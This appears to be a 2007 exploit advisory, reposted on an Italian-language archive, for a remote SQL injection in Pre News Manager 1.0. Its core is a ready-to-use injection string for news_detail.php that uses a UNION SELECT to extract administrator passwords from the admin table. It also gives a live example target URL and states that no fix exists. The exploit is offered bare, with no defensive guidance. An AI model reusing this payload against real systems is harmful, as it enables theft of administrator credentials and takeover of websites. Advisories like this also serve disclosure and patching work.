Pre News Manager 1.0 Remote SQL Injection Vulnerability

2007-05-03 00:00:00

==============================================

Pre News Manager v1.0 Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Script site: http://www.preproject.com/news.asp

==============================================

Exploit:
news_detail.php?nid=-1/**/union/**/select/**/0,1,2,password,4,5,6/**/from/**/admin/*

==============================================

Example: http://www.preproject.com/news%20manager/

==============================================

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.